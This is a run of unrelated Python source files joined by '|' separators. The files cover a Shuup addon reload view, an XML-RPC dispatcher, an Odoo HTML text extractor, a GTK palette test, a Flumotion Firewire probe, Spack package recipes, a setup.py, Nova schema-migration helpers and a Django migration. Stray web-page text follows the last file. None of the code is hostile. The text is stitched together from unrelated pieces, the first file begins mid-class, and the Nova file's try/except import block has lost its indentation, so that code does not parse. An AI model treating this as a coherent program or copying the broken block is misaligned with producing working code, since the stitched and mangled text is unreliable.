        chosen = self.cleaned_data["reload_method"]
        return first(rm for rm in self.reload_methods if rm.identifier == chosen)
def finalize_installation_for_enabled_apps():
    """Activate newly enabled addons and run their installation commands.

    Adds any enabled addon missing from ``INSTALLED_APPS``, reloads the
    app registry, then runs ``migrate`` and ``collectstatic``.

    :return: the captured output of the management commands as a string
    """
    output = StringIO()
    enabled_addons = get_enabled_addons(settings.SHUUP_ENABLED_ADDONS_FILE)
    new_apps = [app for app in enabled_addons if app not in settings.INSTALLED_APPS]
    if new_apps:
        output.write("Enabling new addons: %s" % new_apps)
        # Preserve the concrete type of INSTALLED_APPS (tuple or list).
        settings.INSTALLED_APPS += type(settings.INSTALLED_APPS)(new_apps)
        reload_apps()
    call_command("migrate", "--noinput", "--no-color", stdout=output)
    call_command("collectstatic", "--noinput", "--no-color", stdout=output)
    return output.getvalue()
class ReloadView(FormView):
    """Admin view that triggers an application server reload."""

    template_name = "shuup/admin/addons/reload.jinja"
    form_class = ReloadMethodForm

    def form_valid(self, form):
        # Execute the chosen reload mechanism; the response below may
        # never be delivered if the server restarts first.
        form.get_selected_reload_method().execute()
        return HttpResponse(_("Reloading."))  # This might not reach the user...

    def get(self, request, *args, **kwargs):
        if request.GET.get("ping"):
            # Liveness probe polled by the frontend while waiting for restart.
            return JsonResponse({"pong": time.time()})
        if request.GET.get("finalize"):
            # Post-restart hook: finish installing any newly enabled addons.
            return JsonResponse({"message": finalize_installation_for_enabled_apps()})
        return super(ReloadView, self).get(request, *args, **kwargs)
|
"""Offers a simple XML-RPC dispatcher for django_xmlrpc
Author::
Graham Binns
Credit must go to Brendan W. McAdams <brendan.mcadams@thewintergrp.com>, who
posted the original SimpleXMLRPCDispatcher to the Django wiki:
http://code.djangoproject.com/wiki/XML-RPC
New BSD License
===============
Copyright (c) 2007, Graham Binns http://launchpad.net/~codedragon
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the <ORGANIZATION> nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from inspect import getargspec
from SimpleXMLRPCServer import SimpleXMLRPCDispatcher
from django.conf import settings
# True when the Django settings define a truthy XMLRPC_DEBUG; toggles
# verbose XML-RPC debugging behaviour elsewhere in django_xmlrpc.
DEBUG = hasattr(settings, 'XMLRPC_DEBUG') and settings.XMLRPC_DEBUG
class DjangoXMLRPCDispatcher(SimpleXMLRPCDispatcher):
    """A simple XML-RPC dispatcher for Django.

    Subclassess SimpleXMLRPCServer.SimpleXMLRPCDispatcher for the purpose of
    overriding certain built-in methods (it's nicer than monkey-patching them,
    that's for sure).
    """

    def system_methodSignature(self, method):
        """Returns the signature details for a specified method

        method
            The name of the XML-RPC method to get the details for
        """
        # See if we can find the method in our funcs dict
        # TODO: Handle this better: We really should return something more
        # formal than a KeyError
        func = self.funcs[method]
        try:
            sig = func._xmlrpc_signature
        except AttributeError:
            # Bare `except:` previously swallowed *every* error here; only
            # a missing _xmlrpc_signature attribute should trigger the
            # fallback of assuming string arguments and a string return.
            sig = {
                'returns': 'string',
                'args': ['string' for arg in getargspec(func)[0]],
            }
        return [sig['returns']] + sig['args']
|
import wizard
|
import logging
from lxml import etree, html
from odoo import api, models
_logger = logging.getLogger(__name__)
class IrFieldsConverter(models.AbstractModel):
    _inherit = "ir.fields.converter"

    @api.model
    def text_from_html(self, html_content, max_words=None, max_chars=None,
                       ellipsis=u"…", fail=False):
        """Extract text from an HTML field in a generator.

        :param str html_content:
            HTML contents from where to extract the text.

        :param int max_words:
            Maximum amount of words allowed in the resulting string.

        :param int max_chars:
            Maximum amount of characters allowed in the resulting string. If
            you apply this limit, beware that the last word could get cut in an
            unexpected place.

        :param str ellipsis:
            Character(s) to be appended to the end of the resulting string if
            it gets truncated after applying limits set in :param:`max_words`
            or :param:`max_chars`. If you want nothing applied, just set an
            empty string.

        :param bool fail:
            If ``True``, exceptions will be raised. Otherwise, an empty string
            will be returned on failure.
        """
        # Parse HTML
        try:
            doc = html.fromstring(html_content)
        except (TypeError, etree.XMLSyntaxError, etree.ParserError):
            if fail:
                raise
            else:
                _logger.exception("Failure parsing this HTML:\n%s",
                                  html_content)
                return ""
        # Get words: all text nodes of the document, whitespace-split
        words = u"".join(doc.xpath("//text()")).split()
        # Truncate words; `suffix` records whether any truncation happened,
        # which later decides if the ellipsis must be appended.
        suffix = max_words and len(words) > max_words
        if max_words:
            words = words[:max_words]
        # Get text
        text = u" ".join(words)
        # Truncate text; when the ellipsis will be appended, reserve room
        # for it inside the max_chars budget.
        suffix = suffix or max_chars and len(text) > max_chars
        if max_chars:
            text = text[:max_chars - (len(ellipsis) if suffix else 0)].strip()
        # Append ellipsis if needed
        if suffix:
            text += ellipsis
        return text
|
"""
Test the style of toggle and radio buttons inside a palette. The buttons
contains only an icon and should be rendered similarly to the toolbar
controls. Ticket #2855.
"""
from gi.repository import Gtk
from sugar3.graphics.palette import Palette
from sugar3.graphics.icon import Icon
from sugar3.graphics import style
import common
# Shared palette test harness from the local `common` module.
test = common.TestPalette()

palette = Palette('Test radio and toggle')
test.set_palette(palette)

# Horizontal container holding one toggle button and one radio button,
# both icon-only, to compare their rendering against toolbar controls.
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)

toggle = Gtk.ToggleButton()
icon = Icon(icon_name='go-previous', pixel_size=style.STANDARD_ICON_SIZE)
toggle.set_image(icon)
box.pack_start(toggle, False, False, 0)
toggle.show()

radio = Gtk.RadioButton()
icon = Icon(icon_name='go-next', pixel_size=style.STANDARD_ICON_SIZE)
radio.set_image(icon)
# Draw the radio as a plain button (no round indicator), toolbar-style.
radio.set_mode(False)
box.pack_start(radio, False, False, 0)
radio.show()

palette.set_content(box)
box.show()

if __name__ == '__main__':
    common.main(test)
|
import gobject
import gst
import gst.interfaces
from twisted.internet.threads import deferToThread
from twisted.internet import defer
from flumotion.common import gstreamer, errors, log, messages
from flumotion.common.i18n import N_, gettexter
from flumotion.twisted import defer as fdefer
from flumotion.worker.checks import check
__version__ = "$Rev$"
T_ = gettexter()
class BusResolution(fdefer.Resolution):
    """Resolution that owns a GStreamer pipeline and its bus watch.

    Holds on to the pipeline and the bus 'message' signal handler while a
    check is in flight, and tears both down on cleanup.
    """
    pipeline = None
    signal_id = None

    def cleanup(self):
        pipeline = self.pipeline
        if not pipeline:
            return
        # Detach the bus handler first, then stop the pipeline.
        if self.signal_id:
            pipeline.get_bus().remove_signal_watch()
            pipeline.get_bus().disconnect(self.signal_id)
            self.signal_id = None
        pipeline.set_state(gst.STATE_NULL)
        self.pipeline = None
def do_element_check(pipeline_str, element_name, check_proc, state=None,
                     set_state_deferred=False):
    """
    Parse the given pipeline and set it to the given state.
    When the bin reaches that state, perform the given check function on the
    element with the given name.

    @param pipeline_str: description of the pipeline used to test
    @param element_name: name of the element being checked
    @param check_proc: a function to call with the GstElement as argument.
    @param state: an unused keyword parameter that will be removed when
    support for GStreamer 0.8 is dropped.
    @param set_state_deferred: a flag to say whether the set_state is run in
    a deferToThread
    @type set_state_deferred: bool
    @returns: a deferred that will fire with the result of check_proc, or
    fail.
    @rtype: L{twisted.internet.defer.Deferred}
    """

    def run_check(pipeline, resolution):
        # Called once the pipeline reaches PLAYING: run check_proc on the
        # target element and resolve/errback accordingly.
        element = pipeline.get_by_name(element_name)
        try:
            retval = check_proc(element)
            resolution.callback(retval)
        except check.CheckProcError, e:
            log.debug('check', 'CheckProcError when running %r: %r',
                      check_proc, e.data)
            resolution.errback(errors.RemoteRunError(e.data))
        except Exception, e:
            log.debug('check', 'Unhandled exception while running %r: %r',
                      check_proc, e)
            resolution.errback(errors.RemoteRunError(
                log.getExceptionMessage(e)))
        # set pipeline state to NULL so worker does not consume
        # unnecessary resources
        pipeline.set_state(gst.STATE_NULL)

    def message_rcvd(bus, message, pipeline, resolution):
        # Bus watch: waits for the pipeline to reach PLAYING, and turns
        # errors/EOS into failed resolutions.
        t = message.type
        if t == gst.MESSAGE_STATE_CHANGED:
            if message.src == pipeline:
                old, new, pending = message.parse_state_changed()
                if new == gst.STATE_PLAYING:
                    run_check(pipeline, resolution)
        elif t == gst.MESSAGE_ERROR:
            gerror, debug = message.parse_error()
            # set pipeline state to NULL so worker does not consume
            # unnecessary resources
            pipeline.set_state(gst.STATE_NULL)
            resolution.errback(errors.GStreamerGstError(
                message.src, gerror, debug))
        elif t == gst.MESSAGE_EOS:
            resolution.errback(errors.GStreamerError(
                "Unexpected end of stream"))
        else:
            log.debug('check', 'message: %s: %s:' % (
                message.src.get_path_string(),
                message.type.value_nicks[1]))
            if message.structure:
                log.debug('check', 'message: %s' %
                          message.structure.to_string())
            else:
                log.debug('check', 'message: (no structure)')
        return True

    resolution = BusResolution()

    log.debug('check', 'parsing pipeline %s' % pipeline_str)
    try:
        pipeline = gst.parse_launch(pipeline_str)
        log.debug('check', 'parsed pipeline %s' % pipeline_str)
    except gobject.GError, e:
        # Parse failure: fail the resolution immediately.
        resolution.errback(errors.GStreamerError(e.message))
        return resolution.d

    # Watch the bus so message_rcvd sees state changes and errors; the
    # resolution keeps pipeline/signal_id for later cleanup.
    bus = pipeline.get_bus()
    bus.add_signal_watch()
    signal_id = bus.connect('message', message_rcvd, pipeline, resolution)
    resolution.signal_id = signal_id
    resolution.pipeline = pipeline

    log.debug('check', 'setting state to playing')
    if set_state_deferred:
        # Run the potentially blocking set_state in a thread and chain
        # the resolution's deferred after it.
        d = deferToThread(pipeline.set_state, gst.STATE_PLAYING)

        def stateChanged(res):
            return resolution.d
        d.addCallback(stateChanged)
        return d
    else:
        pipeline.set_state(gst.STATE_PLAYING)
        return resolution.d
def check1394(mid, guid):
    """
    Probe the firewire device.

    Return a deferred firing a result.

    The result is either:
    - succesful, with a None value: no device found
    - succesful, with a dictionary of width, height, and par as a num/den pair
    - failed

    @param mid: the id to set on the message.
    @param guid: the id of the selected device.

    @rtype: L{twisted.internet.defer.Deferred} of
    L{flumotion.common.messages.Result}
    """
    result = messages.Result()

    def do_check(demux):
        # Runs once the pipeline is PLAYING: read negotiated caps off the
        # demuxer's video pad to discover the stream geometry.
        pad = demux.get_pad('video')

        if not pad or pad.get_negotiated_caps() == None:
            raise errors.GStreamerError('Pipeline failed to negotiate?')

        caps = pad.get_negotiated_caps()
        s = caps.get_structure(0)
        w = s['width']
        h = s['height']
        par = s['pixel-aspect-ratio']
        # FIXME: not a good idea to reuse the result name which
        # also exists in the parent context.
        # pychecker should warn; however it looks like
        # the parent result doesn't get stored as name,
        # but instead with STORE_DEREF
        result = dict(width=w, height=h, par=(par.num, par.denom))
        log.debug('check', 'returning dict %r' % result)
        return result

    pipeline = \
        'dv1394src guid=%s ! dvdemux name=demux .video ! fakesink' % guid
    d = do_element_check(pipeline, 'demux', do_check)

    def errbackResult(failure):
        # Translate GStreamer failures into user-facing error messages.
        log.debug('check', 'returning failed Result, %r' % failure)
        m = None
        if failure.check(errors.GStreamerGstError):
            source, gerror, debug = failure.value.args
            log.debug('check', 'GStreamer GError: %s (debug: %s)' % (
                gerror.message, debug))
            if gerror.domain == "gst-resource-error-quark":
                if gerror.code == int(gst.RESOURCE_ERROR_NOT_FOUND):
                    # dv1394src was fixed after gst-plugins-good 0.10.2
                    # to distinguish NOT_FOUND and OPEN_READ
                    version = gstreamer.get_plugin_version('1394')
                    if version >= (0, 10, 0, 0) and version <= (0, 10, 2, 0):
                        m = messages.Error(T_(
                            N_("Could not find or open the Firewire device. "
                               "Check the device node and its permissions.")))
                    else:
                        m = messages.Error(T_(
                            N_("No Firewire device found.")))
                elif gerror.code == int(gst.RESOURCE_ERROR_OPEN_READ):
                    m = messages.Error(T_(
                        N_("Could not open Firewire device for reading. "
                           "Check permissions on the device.")))
            if not m:
                # Fall back to the generic GStreamer device error handler.
                m = check.handleGStreamerDeviceError(failure, 'Firewire',
                                                     mid=mid)
        if not m:
            m = messages.Error(T_(N_("Could not probe Firewire device.")),
                               debug=check.debugFailure(failure))

        m.id = mid
        result.add(m)
        return result

    d.addCallback(check.callbackResult, result)
    d.addErrback(errbackResult)
    return d
|
from spack import *
class Libice(AutotoolsPackage):
    """libICE - Inter-Client Exchange Library."""

    homepage = "http://cgit.freedesktop.org/xorg/lib/libICE"
    url = "https://www.x.org/archive/individual/lib/libICE-1.0.9.tar.gz"

    # Second argument is the md5 checksum of the release tarball.
    version('1.0.9', '95812d61df8139c7cacc1325a26d5e37')

    # Build-time only dependencies: headers, portability layer and
    # autotools/pkg-config machinery.
    depends_on('xproto', type='build')
    depends_on('xtrans', type='build')
    depends_on('pkg-config@0.9.0:', type='build')
    depends_on('util-macros', type='build')
|
from spack import *
class FontIsasMisc(Package):
    """X.org isas-misc font."""

    homepage = "http://cgit.freedesktop.org/xorg/font/isas-misc"
    url = "https://www.x.org/archive/individual/font/font-isas-misc-1.0.3.tar.gz"

    # Second argument is the md5 checksum of the release tarball.
    version('1.0.3', 'ecc3b6fbe8f5721ddf5c7fc66f73e76f')

    depends_on('font-util')

    # Build-time tooling for generating and indexing the font files.
    depends_on('fontconfig', type='build')
    depends_on('mkfontdir', type='build')
    depends_on('bdftopcf', type='build')
    depends_on('pkg-config@0.9.0:', type='build')
    depends_on('util-macros', type='build')

    def install(self, spec, prefix):
        # Standard autotools build of the font package.
        configure('--prefix={0}'.format(prefix))

        make()
        make('install')

        # `make install` copies the files to the font-util installation.
        # Create a fake directory to convince Spack that we actually
        # installed something.
        mkdir(prefix.lib)
|
# Prefer an installed setuptools; on legacy environments fall back to
# bootstrapping it through the bundled ez_setup helper.
try:
    import setuptools
except ImportError:
    import ez_setup
    ez_setup.use_setuptools()
    import setuptools

setuptools.setup(
    name='api',
    version='0.1',
    description='',
    author='',
    author_email='',
    install_requires=[
        "pecan",
    ],
    test_suite='api',
    zip_safe=False,
    include_package_data=True,
    # ez_setup is only the bootstrap helper, not part of the package.
    packages=setuptools.find_packages(exclude=['ez_setup'])
)
|
import os
import sys
from nova import flags
import sqlalchemy
from migrate.versioning import api as versioning_api
try:
from migrate.versioning import exceptions as versioning_exceptions
except ImportError:
try:
# python-migration changed location of exceptions after 1.6.3
# See LP Bug #717467
from migrate import exceptions as versioning_exceptions
except ImportError:
sys.exit(_("python-migrate is not installed. Exiting."))
FLAGS = flags.FLAGS
def db_sync(version=None):
    """Upgrade the database schema to ``version`` (latest when None).

    Calling db_version() first ensures the database is placed under
    migrate's version control before the upgrade is attempted.
    """
    db_version()
    repository = _find_migrate_repo()
    return versioning_api.upgrade(FLAGS.sql_connection, repository, version)
def db_version():
    """Return the database's current migrate version.

    If the database is not yet under version control, inspect its tables:
    a database that already contains all the known pre-versioning tables
    is stamped as version 1, anything else as version 0.
    """
    repo_path = _find_migrate_repo()
    try:
        return versioning_api.db_version(FLAGS.sql_connection, repo_path)
    except versioning_exceptions.DatabaseNotControlledError:
        # If we aren't version controlled we may already have the database
        # in the state from before we started version control, check for that
        # and set up version_control appropriately
        meta = sqlalchemy.MetaData()
        engine = sqlalchemy.create_engine(FLAGS.sql_connection, echo=False)
        meta.reflect(bind=engine)
        try:
            # All of these legacy tables must exist for the schema to be
            # considered a pre-versioning (version 1) database.
            for table in ('auth_tokens', 'zones', 'export_devices',
                          'fixed_ips', 'floating_ips', 'instances',
                          'key_pairs', 'networks', 'projects', 'quotas',
                          'security_group_instance_association',
                          'security_group_rules', 'security_groups',
                          'services', 'migrations',
                          'users', 'user_project_association',
                          'user_project_role_association',
                          'user_role_association',
                          'volumes'):
                assert table in meta.tables
            return db_version_control(1)
        except AssertionError:
            return db_version_control(0)
def db_version_control(version=None):
    """Place the database under migrate's version control at ``version``.

    :return: the version the database was stamped with
    """
    repository = _find_migrate_repo()
    versioning_api.version_control(FLAGS.sql_connection, repository, version)
    return version
def _find_migrate_repo():
"""Get the path for the migrate repository."""
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
return path
|
from __future__ import absolute_import
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the per-podcast tipping payout bookkeeping fields."""

    dependencies = [
        ('podcasts', '0014_auto_20160503_0247'),
    ]

    operations = [
        # Remove the timestamp of the last tip payout.
        migrations.RemoveField(
            model_name='podcast',
            name='tip_last_payout',
        ),
        # Remove the amount paid out in the last tip payout.
        migrations.RemoveField(
            model_name='podcast',
            name='tip_last_payout_amount',
        ),
        # Remove the accumulated tip value.
        migrations.RemoveField(
            model_name='podcast',
            name='tip_value',
        ),
    ]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.